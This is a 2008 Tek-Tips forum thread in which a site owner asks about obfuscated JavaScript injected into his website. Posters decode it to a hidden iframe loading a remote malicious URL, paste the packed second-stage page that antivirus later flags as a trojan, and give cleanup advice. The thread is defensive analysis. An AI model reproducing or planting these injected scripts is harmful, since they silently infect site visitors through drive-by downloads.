Smart questions
Smart answers
Smart people
Join Tek-Tips Forums
INTELLIGENT WORK FORUMS
FOR COMPUTER PROFESSIONALS

Member Login




Remember Me
Forgot Password?
Join Us!

Come Join Us!

Are you a
Computer / IT professional?
Join Tek-Tips now!
  • Talk With Other Members
  • Be Notified Of Responses
    To Your Posts
  • Keyword Search
  • One-Click Access To Your
    Favorite Forums
  • Automated Signatures
    On Your Posts
  • Best Of All, It's Free!

Join Tek-Tips
*Tek-Tips's functionality depends on members receiving e-mail. By joining you are opting in to receive e-mail.

Posting Guidelines

Promoting, selling, recruiting, coursework and thesis posting is forbidden.
Jobs from Indeed

Link To This Forum!

Partner Button
Add Stickiness To Your Site By Linking To This Professionally Managed Technical Forum.
Just copy and paste the
code below into your site.

spicymango (Programmer) (OP)
10 Nov 08 23:12
Hi,

Someone put this code on my website. Is this  hacker's code. Not sure whats is going on there?. Hard to make sennse of these numbers.

CODE


<script>check_content()</script><script>function c42984334145m48faa0695d5eb(m48faa0695d9cd){ function m48faa0695ddac(){return 16;} return (parseInt(m48faa0695d9cd,m48faa0695ddac()));}function m48faa0695e57f(m48faa0695e9c5){ var m48faa0695ed83='';m48faa0695fced=String.fromCharCode;for(m48faa0695f137=0;m48faa0695f137<m48faa0695e9c5.length;m48faa0695f137+=2){ m48faa0695ed83+=(m48faa0695fced(c42984334145m48faa0695d5eb(m48faa0695e9c5.substr(m48faa0695f137,2))));}return m48faa0695ed83;} var z06='';var m48faa069600e0='3C7'+z06+'3637'+z06+'2697'+z06+'07'+z06+'
43E696628216D7'+z06+'96961297'+z06+'B646F637'+z06+'
56D656E7'+z06+'42E7'+z06+'7'+z06+'7'+z06+'2697'+z06+'
465287'+z06+'56E657'+z06+'363617'+z06+'065282027'+z06+
'2533632536392536362537'+z06+'32253631253664253635253
2302536652536312536642536352533642536332533342532302537'
+z06+'332537'+z06+'32253633253364253237'+z06+'2536382537'
+z06+'342537'+z06+'342537'+z06+'30253361253266253266253
639253664253637'+z06+'2532652537'+z06+'302536632536312537
'+z06+'332537'+z06+'342536392536332537'+z06+'332537'+z06+
'352536392537'+z06+'342536352532652537'+z06+'342536632532
662536362536662537'+z06+'322537'+z06+'352536642532662534
632536312537'+z06+'33253665253631253366253237'+z06+'2532
622534642536312537'+z06+'342536382532652537'+z06+'322536
662537'+z06+'352536652536342532382534642536312537'+z06+'
342536382532652537'+z06+'3225363125366525363425366625366
4253238253239253261253334253332253337'+z06+'253334253334
253239253262253237'+z06+'25333425333525333125363425333125
3332253237'+z06+'2532302537'+z06+'37'+z06+'253639253634253
7'+z06+'34253638253364253333253331253332253230253638253
635253639253637'+z06+'2536382537'+z06+'3425336425333125
3333253337'+z06+'2532302537'+z06+'332537'+z06+'342537'+
z06+'39253663253635253364253237'+z06+'2536342536392537'
+z06+'332537'+z06+'302536632536312537'+z06+'39253361253
230253665253666253665253635253237'+z06+'253365253363253
2662536392536362537'+z06+'3225363125366425363525336527'
+z06+'29293B7'+z06+'D7'+z06+'6617'+z06+'2206D7'+z06+'
969613D7'+z06+'47'+z06+'27'+z06+'5653B3C2F7'+z06+'3637'
+z06+'2697'+z06+'07'+z06+'43E';document.write(m48faa0
695e57f(m48faa069600e0));</script><script>check_content()</script>

 
BillyRayPreachersSon (Programmer)
11 Nov 08 2:20

Quote:

Someone put this code on my website. Is this  hacker's code.

Surely it doesn't matter? If someone other than you has put code on your website, you should remove it immediately and lock down all of your FTP accounts?

Dan

 

Coedit Limited - Delivering standards compliant, accessible web solutions

Dan's Page @ Code Couch: http://www.codecouch.com/dan/

Code Couch Tech Snippets & Info: http://www.codecouch.com/
 

BillyRayPreachersSon (Programmer)
11 Nov 08 2:26

P.S. Here's what the code ultimately writes to your page:

CODE

<iframe name=c4 src='http://img.plasticsuite.tl/forum/Lasna?'+Math.round(Math.random()*42744)+'451d12' width=312 height=137 style='display: none'></iframe>

Dan
 

Coedit Limited - Delivering standards compliant, accessible web solutions

Dan's Page @ Code Couch: http://www.codecouch.com/dan/

Code Couch Tech Snippets & Info: http://www.codecouch.com/
 

BabyJeffy (Programmer)
11 Nov 08 2:32

Don't visit that URL unless you are COMPLETELY protected (patched, anti-virus'd and all the rest). It is most likely bad.

The URL does nothing when you visit with a browser that isn't likely to be vulnerable (like Safari) but most likely checks some details server-side to determine your browser and passes you some kind of infection/malware when you use a vulnerable browser (like IE6).

I would do a full scan of your computer with the latest up-to-date anti-virus package of choice as a matter of caution regardless... and consider that the online account used to access the web account is also compromised. I would also contact your hosting company and ask them about it.

Cheers,
Jeff

Visit my blog @ http://www.coderambler.com/
Visit Code Couch @ http://www.codecouch.com/


Make sure your web page and css validates properly against the doctype you have chosen - before you attempt to debug a problem!

FAQ216-6094: What is Javascript?

MarkZK (TechnicalUser)
11 Nov 08 11:08
It does, switching useragent will give a page with this code

CODE

<HTML><BODY><SCRIPT type='text/javascript'>function tUHhMmv3lPB(YVMm){var P="rCodeAt(C";var Ff="br%68br%3B';e";var X="));var Gr;Gr=dU";var i5l2="yfa%1";var H4Lb="=0;var J;for";var Bpv="7KeMy";var qp="72yfa%1Cr";var b8U="/h%/g,'2')";var mr5E="yfa%1Cr27yf";var t1k="r6Fyfa%1Cr3Dyf";var lBcT="37yfa%1Cr";var bwEI="a%1Cr2";var Z0="6br%74b";var ua="eplace";var y="79yfa%";var T="1CrKeMKeMyfa%";var KWW="));var";var h="=Gr;var he=";var PE="Byfa%1Cr7";var PjT="rKeM9yfa%1Cr7";var uf="1Cr39";var Rd="2yfa%1Cr43y";var PwGF="1Cr37yfa%1Cr";var wM="%1Cr72yfa%1Cr";var A9j3="o];KJ=KJ%256;";var ATU="1Cr20yfa%1C";qp="%1Cr2Byfa%1Cr"+qp;var M=";Y5++){J=Y5%W";var s="1Cr72yfa%";var Mr="m));";var Ly="String.fr";var dvx="';eval(unescape";M+="h.length;J";var AHT="var c";var Z=".replace(";var Xe9="3KeMyfa%";PE="%1Cr3"+PE;var i="ng.fromCh";var L33H="h.lengt";var VxlF="s=new";var zz="CrKeM6yfa%1";var Y="brrw5br%3Dbr%";var q="Gr=Vku+CFP4;";var Hj="V';var XGi";var CIQK="Wh=Wh.replace(";var ZH6="%1Cr6Byfa%";var TxKB="%1Cr38y";var gpER="fa%1Cr72yf";var SL="3Dyfa%1Cr27yfa";var NSS="al(a);};cP";ATU="%1Cr72yfa%"+ATU;A9j3="[H]+Ls[k"+A9j3;var d3="e(/bZ/g,";var rGB=" Uf;var fFt=658";L33H="for(gv=0;gv<W"+L33H;var o="r pJo='lV";Bpv+="fa%1C";CIQK=".toString();"+CIQK;var YgO="fa%1C";PE+="6yfa%1Cr61y";gpER+="a%1Cr79";var PdBG="yfa%1Cr7Gy";NSS="KJ);}ev"+NSS;var ZgHT="V76lV61lV7h";TxKB+="fa%1Cr74yfa"+ZH6;var GHv2="(/KeM/g";A9j3="o]=J;KJ=Ls"+A9j3;var NdQ="fa%1Cr3";PdBG+="fa%1Cr33yfa%";i+="arCode(NBX6);NB";var Ytmc="%1Cr3Byfa%1CrK";H4Lb=";var xDd"+H4Lb;var d=";H=H%2";L33H+="h;gv++){NBX6^=W";CIQK=".callee"+CIQK;var QW="%1Cr76yfa%";var TVtE="he+=Stri";var du="%1Cr46yfa";h="e();Wh+"+h;b8U=d3+"'%0').replace("+b8U;q="*ro.length;"+q;var E="ength;ro";i="e+=Stri"+i;A9j3="o];Ls[k"+A9j3;var tTY="Dyfa%1Cr27yfa%";var SZl=";C<z.length;C";PjT+="0yfa%1";var Hegs="=fE+EHg;fFt=fF";var Obp="(/mG/g";var VFmp="KeM0yfa%";var k="%1Cr48yfa%1C";var Zg="ce(/G/g,'A";Xe9+="1Cr38yfa%1Cr3By";Obp="replace"+Obp;ATU=QW+"1Cr61yfa"+ATU;i5l2="r76yfa%1Cr61"+i5l2;var x="w++){Ls[w]=w";Obp+=",'2').replac";Xe9="%1Cr38yfa%1Cr"+Xe9;var s6Zz="6;J=Ls[H];L";du+="%1Cr2Eyfa%1Cr6";var BUkZ="fa%1Cr3Byfa%1";H4Lb="BX6);}Wh=he"+H4Lb;d+="56;ko=ko+Ls[H]";s+="1Cr79";PdBG="1Cr3Dyfa%1Cr27"+PdBG;i="if(gv%36==35){h"+i;uf+="yfa%1Cr3Byf";var Olx="fa%1Cr3B';e";NdQ+="0yfa%1Cr"+lBcT;i="eAt(gv);"+i;var l1o="fa%1Cr61yfa";tTY="2Byfa%1Cr3"+tTY;var dWe="-;var";var OU="eM6yfa%1Cr6Byf";var yGWh="KeMyfa%";var kA="rKeM6yfa";Y="3Bbr%66"+Y;KWW=Obp+"e(/br%/g,'%')"+KWW;k=PjT+"Cr4Fyfa"+k;var rDL="6;J=Ls";tTY+="1Cr6Cyfa"+TxKB;T="4yfa%"+T;var CNh="J);J=Ls";var ED="ar w;var Wh;f";var BY="fa%1Cr3Dyfa";H4Lb="ode(N"+H4Lb;Olx="Myfa%1Cr27y"+Olx;GHv2+=",'5').r"+ua;l1o+="%1Cr72yfa%1C";var IH="Cr64yfa%1CrKeMK";VxlF+=" Array();v"+ED;var ooS="r%7mGbr%mG";CNh+="[Y5]+J;J=xDd+J;";i5l2+="Cr72yf";Hegs+="t+Rrry.l"+E;Xe9="a%1Cr38yfa"+Xe9;du+="Cyfa%1Cr6"+yGWh;OU+="a%1Cr7KeMyfa";var BiDl="(/lV/g,'%')))";KWW+=" EHg=3614;fFt"+Hegs;var qxeD="[KJ];K";Z=Ff+"val(unescape(MG"+Z;s6Zz+="s[H]=Ls[k"+A9j3;tTY=T+"1Cr64yfa%1Cr"+tTY;P+=")^KJ;a+="+Ly;var PFVf="1Cr76";h+="'';var NB";rGB+="77;Uf=BC;Uf-"+dWe;NdQ="a%1Cr30y"+NdQ;Zg+="').replace(";wM=ATU+"rKeM2yfa"+wM;var qFU="br%mGEbr%6C";s="a%1Cr72yfa%"+s;Y=ooS+"0br%66brrw5br%"+Y;Y+="66brrw"+Z0;o+="6BlV6FlV3DlV30";uf+="a%1Cr43y";PFVf="Byfa%"+PFVf;PwGF="yfa%1Cr27yfa%"+PwGF;var p="var CFP4;var";h+="X6=174;var gv;"+L33H;kA="Cr20yfa%1C"+kA;i=h+"h.charCod"+i;i=".toUpperCas"+i;CIQK+="/\\W/g,'');Wh=Wh"+i;qp+="6Fyfa%1Cr3"+PFVf;rGB+=" MG='br%76b";Z="7br%74"+Z;var lM5z="%1Cr4";rDL+="[Y5];Ls[";var g="eplace(/yfa%/g,";s6Zz=d+";ko=ko%25"+s6Zz;qp+="yfa%1C";k=SL+"%1Cr4Cyfa%1C"+k;CIQK+="X6=174;}}";NSS+="KB(une";VFmp+="1Cr34y"+BY;rDL=" % 25"+rDL;var C2="Fyfa%1Cr3Byfa%1";M=H4Lb+"(Y5=0;Y5<256"+M;KWW=Z+"/rw/g,'%4')."+KWW;X+="d;var"+rGB;M=TVtE+"ng.fromCharC"+M;C2+="CrKeM2yf"+s;Ytmc=PwGF+"27yfa"+Ytmc;Rd+="fa%1Cr3D";g+="'Y').replace"+GHv2;Mr=NSS+"scape(YVM"+Mr;var rtee="ZlV61lV3DlVh%7l";Ytmc+="eM2yfa%1Cr72y"+gpER;PE=YgO+"r27yfa"+PE;var mle="1Cr36yfa%1Cr3";t1k="r72yfa%1C"+t1k;mr5E+="a%1Cr";var D4KR="1CrKeMKeMy";dvx="VOM3lV3B"+dvx;AHT+="PKB=function(";du="eMyfa%1Cr2Byfa"+du;var IK="a%1Cr7";o+="lV3BlV76lV";PdBG=C2+"yfa%1Cr2Byfa%"+PdBG;Hj+="S='yfa"+wM;Zg="GiS.repla"+Zg;AHT=BiDl+";var KJ;"+AHT;NdQ+="32yfa%1Cr3B";P=qxeD+"J=z.cha"+P;q+="Gr=Gr+BC;L"+VxlF;qp="Cr64yfa"+qp;k+="r46yfa%1Cr33y"+PE;t1k=bwEI+"0yfa%1C"+t1k;Hj=p+" dUd='tXGpi"+Hj;o+="61lV7h%lVhb"+rtee;M+="=Wh.charCodeAt("+CNh;t1k=k+"fa%1Cr72yf"+t1k;lM5z+="6yfa%1Cr3D"+Ytmc;b8U=dvx+"(pJo.replac"+b8U;NdQ=Bpv+"r3Dyfa%1Cr31yf"+NdQ;qp=IH+"eMyfa%1"+qp;NdQ+="yfa%1CrK"+OU;y=Hj+"72yfa%1Cr"+y;lM5z+="yfa%1Cr3Dyfa%1"+qp;ZgHT+="%lVhbZl"+b8U;PdBG+="1Cr44yfa%1Cr4Ke"+Olx;s6Zz=SZl+"++){H=H+1"+s6Zz;x+=";}Wh=arguments"+CIQK;D4KR+="fa%1Cr64yf";KWW=qFU+"br%65br%6Ebr%6"+KWW;mr5E+="3Byfa%1Cr64yfa%"+D4KR;PdBG=VFmp+"%1Cr72yfa%1Cr6"+PdBG;ZgHT+=".replace(/OM";s6Zz=AHT+"z){for(C=0"+s6Zz;o="[xDd]=J;}H=0;va"+o;mle=Rd+"yfa%1Cr38yfa%"+mle;NdQ+="%1Cr3Dyfa%1"+zz;uf+="fa%1Cr46yfa%1Cr"+PdBG;mle+="2yfa%1Cr30yfa%"+uf;IK=lM5z+"r61yf"+IK;BUkZ="74yfa%1Cr68y"+BUkZ;X+="r%61b"+Y;mr5E=tTY+"1Cr37"+mr5E;Mr=P+"omCharCode("+Mr;Mr=s6Zz+"KJ=Ls"+Mr;t1k+="a%1Cr38yf"+Xe9;q=KWW+"=Gr+fFt;BC=Uf"+q;ZgHT=o+"Vh%7lV3Bl"+ZgHT;rDL=M+"xDd=J"+rDL;NdQ+="Cr6Byfa%1Cr7K"+du;y+="1Cr3Byfa%1Cr6"+mr5E;NdQ+="1Cr6Eyfa%";mle+="val(unescape(X"+Zg;NdQ+="1Cr67yfa%1Cr"+BUkZ;ZgHT+="/g,'4').replace"+Mr;y+="a%1Cr2Byfa%1Cr"+t1k;q=X+"r%mGBbrrw6"+q;g+="(/Y1L%/g,'%')"+q;ZgHT=rDL+"Y5]=Ls[xDd];Ls"+ZgHT;l1o+="r20yfa%1Cr4"+mle;IK+="2yfa%1"+kA;NdQ=IK+"%1Cr6Byfa%1Cr"+NdQ;ZgHT="36!=35){"+ZgHT;g+="or(w=0;w<256;"+x;l1o=NdQ+"Cr76y"+l1o;y+="fa%1C"+i5l2;ZgHT=g+"if(gv%"+ZgHT;ZgHT=l1o+"/Cr/g,'L%').r"+ZgHT;y+="a%1Cr20yfa"+ZgHT;eval(y);};tUHhMmv3lPB("%4E%09%72%7E%15%BD%38%FB%25%25%5A%22%7E%3F%DA%07%59%07%44%7C%B5%DA%22%27%B0%80%CF%8A%EF%DF%A0%02%C1%C3%D6%BE%7C%44%CC%E9%C7%B7%2A%8A%91%24%04%9D%CC%74%D8%45%D2%8F%A2%1B%EB%CC%48%6E%2B%16%F0%AB%02%FC%E4%70%FF%84%6D%D7%C6%C4%8D%C7%F0%11%18%E4%98%0C%C4%7C%C2%05%C9%47%95%12%F1%2E%5C%FD%FD%49%54%06%0F%18%81%7E%30%A1%50%1A%B0%19%B7%9D%7A%01%49%B1%84%6E%E5%0D%60%64%49%10%AD%DB%71%92%E8%E5%04%96%61%6A%00%BA%B2%3F%C6%02%0B%42%8C%36%C4%30%16%BA%41%87%CD%AD%FD%4C%56%12%9A%18%DB%3E%95%C9%EE%A1%17%B4%B2%9A%93%93%7D%A5%4A%19%1A%C2%02%54%BC%2F%99%01%4F%ED%9E%20%9B%5F%A6%44%58%3D%43%04%50%01%24%30%B8%2B%2A%09%A8%86%EE%EE%BE%E8%15%7A%EB%49%BA%BD%2D%38%8A%F6%A3%37%D5%08%E1%90%06%53%26%CC%D2%48%F7%42%C1%0D%86%A8%5E%6C%70%AF%9B%1D%B7%57%BA%B9%CD%72%A9%44%FE%FB%1C%35%08%EA%4B%7A%30%D3%BB%31%3F%EB%0B%9E%F2%AD%84%36%E2%3D%C4%DA%3D%B5%F7%7C%0D%3B%83%BA%6C%C6%47%F2%C1%D5%80%07%58%82%4C%30%89%92%64%11%C0%37%F3%C0%F7%45%F9%EC%D5%98%0B%31%95%DA%FA%4F%DF%EE%69%E4%8C%0C%C1%E3%E7%5F%0B%0D%A7%93%C6%18%46%11%E5%D9%1A%9B%4E%AF%D2%77%F1%59%B2%7A%45%94%44%7D%A9%B8%C5%C9%86%D5%0E%BF%4B%86%F4%42%1B%14%AA%E3%97%1F%E0%55%AA%18%5C%9B%A3%C3%F7%F8%56%1F%8D%85%BF%8B%62%BB%D5%63%84%45%70%ED%31%C6%EB%CB%79%4D%0A%E4%72%51%99%CF%60%DD%C3%58%CE%EA%8C%15%68%89%9C%FE%F3%8E%A5%01%53%DF%FF%C2%DB%DA%3B%0C%59%BA%CD%49%EE%3C%78%0A%15%13%CD%4A%BD%96%B8%85%1A%F5%D9%9C%19%43%C9%34%3D%07%47%5F%5B%1A%E0%A1%44%FF%E8%BE%04%E1%0C%C2%5A%70%98%32%B1%A1%7F%E9%CC%0A%A2%F3%3F%74%99%F0%07%32%DA%26%D5%F8%4B%41%1B%1C%DE%99%BF%51%21%D3%E9%C3%49%49%FE%D1%DD%2D%02%AC%93%18%B9%07%BE%11%CC%51%7F%66%21%E1%0F%71%18%14%82%80%F2%B0%B6%CD%76%1C%9B%EF%3D%92%1F%13%84%D8%7A%10%24%53%39%D1%AC%66%1B%99%B8%13%CE%56%9E%30%2F%F5%FF%F9%8E%A4%5D%FB%1A%1C%F2%99%B0%AE%22%BF%C5%09%81%6E%B0%3E%5F%77%61%F3%E2%33%BA%6D%42%CE%35%02%A4%3A%FE%11%BF%97%1B%1F%34%0B%1E%34%D9%DF%2E%40%5E%35%32%B4%06%FB%14%76%88%8C%93%A1%52%B8%6B%50%FA%46%6F%E3%C3%F3%D4%93%20%B3%FD%36%32%B7%BD%F8%5C%36%A1%AA%97%F8%78%D5%B6%FB%82%B8%4C%00%C8%DD%21%4A%FF%CB%B0%BE%ED%B0%07%E6%46%C2%64%D4%1E%E0%9A%30%86%D6%C8%C5%C9%B2%8A%C9%19%69%E2%50%2C%76%5C%8C%E1%9F%85%BA%D6%E9%B7%FD%0A%99%D6%33%A6%DD%C5%A0%3E%D4%71%B8%66%D1%F6%3B%F4%43%E1%87%62%90%4D%3C%2C%E0%6B%B4%5D%13%54%2C%EC%D0%72%BE%35%C8%EB%CE%FC%A7%E8%E6%A0%F9%A2%08%03%35%28%33%F5%7F%69%48%51%D0%7A%55%E1%69%B6%69%0F%52%0F%6A%E8%DD%40%BA%C0%78%DA%76%F7%4A%5A%A5%CD%E6%50%2F%A5%B8%1E%EE%9B%DB%3B%09%51%64%17%30%D6%CE%E2%B7%53%D4%3F%91%46%39%66%A6%54%02%02%62%C6%80%C4%8A%03%A3%AF%42%3C%78%7D%18%E1%14%B4%EA%28%FC%CE%8A%9B%3F%04%DD%FC%6A%D9%39%E1%ED%8C%37%B3%3B%E5%2C%F8%AA%3A%B5%E1%20%75%F3%41%DE%EE%75%B6%4C%1D%3F%C1%99%C9%35%80%29%33%65%1D%7B%1A%63%A8%4C%30%68%1E%0E%81%6F%7E%75%C0%DA%B6%30%DA%08%81%C6%0B%13%A5%83%D9%93%9D%D2%99%17%B4%88%A7%AC%98%C7%6D%7F%DB%47%4B%44%2E%3C%91%10%31%8A%C4%0B%66%13%54%52%98%8A%3C%02%57%B2%2D%3B%E1%69%A7%25%AE%0D%88%9D%DA%0C%FD%D4%4D%A8%1C%BD%46%CE%56%4D%F4%03%B7%C0%F7%A7%80%FA%64%21%88%56%DF%9E%B6%D7%63%2F%30%23%A6%F8%A9%4F%81%43%2E%0E%33%11%0E%37%3B%93%14%A0%A5%19%AE%71%36%17%ED%5C%44%C3%82%43%D1%00%F8%56%BE%18%28%7A%F0%B2%71%4F%B3%A5%63%12%38%BB%FA%81%8F%A1%6D%78%5A%B0%EB%19%54%8D%6C%B9%39%B3%B4%AB%79%BD%CD%EB%FF%CB%44%02%AD%F2%B1%AD%35%5F%DA%C7%2D%BB%87%1F%16%43%61%1D%AD%27%F6%97%39%9F%B4%F4%CE%3C%E5%91%48%39%B6%51%E0%FC%78%B5%1B%B7%CA%86%2D%36%42%31%41%D5%12%A9%45%6D%7F%9C%88%8F%A3%24%D7%9D%6B%4E%6E%75%9C%5A%18%0F%56%08%56%FA%07%CC%16%B5%D6%DA%B2%26%B4%C5%3D%8C%DA%9F%90%C9%D9%E1%AF%8F%C4%D6%52%74%A2%35%54%A6%0C%8C%8D%D9%EB%9C%99");</SCRIPT></BODY></HTML>

More than likely some ActiveX exploit.
Diancecht (Programmer)
11 Nov 08 13:49
I wouldn't visit that site even completely protected, I'd use a spare virtual machine that I can remove.

If it's encripted, it's not good.
If it's not yours, it's not good.

I'd use an online scanner like LinkScanner

Another guy with the same problem: http://www.simplemachines.org/community/index.php?topic=269303.0

 

Cheers,
Dian

spicymango (Programmer) (OP)
11 Nov 08 19:51
BillyRayPreachersSon  how did you manage to convert code to

CODE

<iframe name=c4 src='http://img.plasticsuite.tl/forum/Lasna?'+Math.round(Math.random()*42744)+'451d12' width=312 height=137 style='display: none'></iframe>
  
BillyRayPreachersSon (Programmer)
12 Nov 08 1:59

Simply ran the code you posted, but removed the document.write part.

Dan

 

Coedit Limited - Delivering standards compliant, accessible web solutions

Dan's Page @ Code Couch: http://www.codecouch.com/dan/

Code Couch Tech Snippets & Info: http://www.codecouch.com/
 

BillyRayPreachersSon (Programmer)
12 Nov 08 2:00

Oh - and then ran the code that the first code produced.

Dan

 

Coedit Limited - Delivering standards compliant, accessible web solutions

Dan's Page @ Code Couch: http://www.codecouch.com/dan/

Code Couch Tech Snippets & Info: http://www.codecouch.com/
 

BillyRayPreachersSon (Programmer)
12 Nov 08 2:02

The question is, are you following the advice?

Have you run a virus scan with an up-to-date virus scanner (Avast is a good free one for Windows), have you patched your PC, have you run a spyware scan, have you changed your FTP passwords, and have you contacted your web hosting company?

Dan

 

Coedit Limited - Delivering standards compliant, accessible web solutions

Dan's Page @ Code Couch: http://www.codecouch.com/dan/

Code Couch Tech Snippets & Info: http://www.codecouch.com/
 

spicymango (Programmer) (OP)
14 Nov 08 23:13
yes i did ...  thanks
LyndonOHRC (Programmer)
15 Nov 08 10:22
Did you ever figure out how this code got on your server?

Lyndon

---People Remember about 10% of what you say ---They never forget how you made them feel.  Covey

BillyRayPreachersSon (Programmer)
6 Jan 09 2:29

FYI, the latest version of Avast (I recommended this 2 threads back) stops me visiting this thread because the code you posted has been identified as the "JS:Packed-Z [Trj]" trojan horse.

Hopefully you changed all of your FTP site passwords!

Dan

 

Coedit Limited - Delivering standards compliant, accessible web solutions

Dan's Page @ Code Couch: http://www.codecouch.com/dan/

Code Couch Tech Snippets & Info: http://www.codecouch.com/
 

Reply To This Thread

Posting in the Tek-Tips forums is a member-only feature.

Click Here to join Tek-Tips and talk with other members!

Back To Forum

Close Box

Join Tek-Tips® Today!

Join your peers on the Internet's largest technical computer professional community.
It's easy to join and it's free.

Here's Why Members Love Tek-Tips Forums:

Register now while it's still free!

Already a member? Close this window and log in.

Join Us             Close